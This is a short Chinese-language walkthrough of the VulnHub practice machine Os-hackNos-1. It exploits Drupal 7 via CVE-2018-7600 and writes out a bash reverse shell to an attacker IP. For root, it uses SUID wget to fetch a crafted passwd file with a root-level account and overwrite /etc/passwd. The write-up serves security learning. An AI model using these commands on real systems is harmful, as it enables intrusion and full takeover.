靶场名称:Os-hackNos-1
难度:简单
下载链接:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
环境搭建
下一步使用虚拟机(vm)打开镜像
这里如果没有ip 的话参考
https://www.yuque.com/docs/share/76c0f057-3a94-40dd-b17d-7d9c02c59129?# 《Vulnhub靶机检测不到IP》
WEB渗透
*80和22端口开着,一个ssh远程连接一个web服务
打开80端口查看,发现是ubuntu的默认网页
扫描目录(这里用的dirsreach默认字典,也可以-w 路径 指定字典)
一开始再纠结james漏洞,发现存在任意命令执行,不过需要知道账户密码
后来查看了一下指纹信息
发现是drupal框架,寻找有无可利用漏洞,这里是drupal7 版本
这里从github上下载exp工具使用:https://github.com/pimps/CVE-2018-7600
这里尝试利用任意代码执行反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.50.164/20888 <&1'
提权
通过命令查看系统版本和内核信息
uname -a
lsb_release -a
这里可以远程建一个http服务,用Wget下载,但无执行权限,想办法赋予权限或者采用其他方法
SUID提权
这里查看一下suid权限
find / -perm -u=s -type f 2>/dev/null
这里发现wget拥有root权限,可以用wget下载替换文件
替换/etc/passwd
在kali上生成密码
openssl passwd ‐1 ‐salt 'sun' 123456
创建文件passwd 把 写入summer 为root权限
vim passwd
复制粘贴原来的passwd
加入summer
sun:$1$sun$Rf54ApPQD/7saC.SbX/OQ.:0:0:root:/root:/bin/bash
下载替换/etc/passwd
wget http://192.168.50.164:10888/passwd -O /etc/passwd
//python 实现交互shell
python3 -c 'import pty; pty.spawn("/bin/bash")'